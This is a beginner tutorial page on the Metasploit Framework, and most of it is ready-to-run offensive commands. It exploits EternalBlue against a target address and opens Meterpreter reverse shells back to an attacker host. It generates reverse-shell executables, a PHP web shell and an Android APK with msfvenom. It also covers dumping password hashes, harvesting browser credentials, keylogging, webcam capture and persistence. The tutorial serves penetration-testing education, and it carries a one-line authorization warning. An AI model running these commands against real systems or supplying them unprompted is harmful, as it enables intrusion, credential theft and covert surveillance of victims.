Metasploit Framework Tutorial — Complete Guide for Beginners

Metasploit Framework — The Hacker's Swiss Army Knife

Metasploit is the world's most widely used penetration testing framework. It contains over 2,200 exploits, 1,100 auxiliary modules, and 400+ payloads. It is maintained by Rapid7 and comes pre-installed in Kali Linux.

Professional penetration testers use Metasploit daily. Understanding it is non-negotiable for any ethical hacker.

Starting Metasploit

# Initialize Metasploit database (first time only)
sudo msfdb init

# Start Metasploit console
msfconsole

# You'll see the iconic banner and msf6 > prompt

Core Metasploit Concepts

Module Types

• exploit: Code that takes advantage of a vulnerability
• auxiliary: Scanning, fuzzing, brute-forcing (no payload needed)
• post: Post-exploitation modules (run after gaining access)
• payload: Code that runs on the target after exploitation
• encoder: Obfuscate payloads to evade antivirus

Basic Workflow

# 1. Search for exploits
msf6 > search eternalblue
msf6 > search type:exploit platform:windows smb

# 2. Select an exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# 3. Show required options
msf6 exploit(ms17_010_eternalblue) > show options

# 4. Set the target
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.5
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100  # your IP
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444

# 5. Select payload
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 6. Run the exploit
msf6 exploit(ms17_010_eternalblue) > run

Meterpreter — Advanced Shell

Meterpreter is Metasploit's advanced payload. It runs entirely in memory (no files on disk), encrypted communication, and is extremely powerful.

# After successful exploit, you get Meterpreter:
meterpreter > 

# System information
meterpreter > sysinfo
meterpreter > getuid        # Current user
meterpreter > getpid        # Process ID

# File operations
meterpreter > ls            # List files
meterpreter > pwd           # Current directory
meterpreter > download /etc/passwd /tmp/  # Download file
meterpreter > upload malware.exe C:\Users\

# Privilege escalation
meterpreter > getsystem     # Try to escalate to SYSTEM
meterpreter > getprivs      # List privileges

# Screenshot and webcam
meterpreter > screenshot    # Take desktop screenshot
meterpreter > webcam_snap   # Capture webcam photo

# Network operations
meterpreter > arp           # ARP table
meterpreter > route         # Routing table
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.5  # Port forward

# Persistence
meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.100

Creating Custom Payloads with MSFvenom

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe

# Linux reverse shell ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o malicious.apk

# Set up listener before deploying:
msf6 > use multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.100
msf6 > set LPORT 4444
msf6 > run

Post-Exploitation Modules

# Dump Windows password hashes
meterpreter > run post/windows/gather/hashdump

# Gather saved browser passwords
meterpreter > run post/multi/gather/firefox_creds

# Keylogging
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

# Enumerate network
meterpreter > run post/multi/recon/local_exploit_suggester

⚠️ Remember: Use Metasploit only on machines you own or have written authorization to test. Unauthorized use is a serious crime.

🔥 Practice Metasploit in a safe lab environment at ONLY4YOU →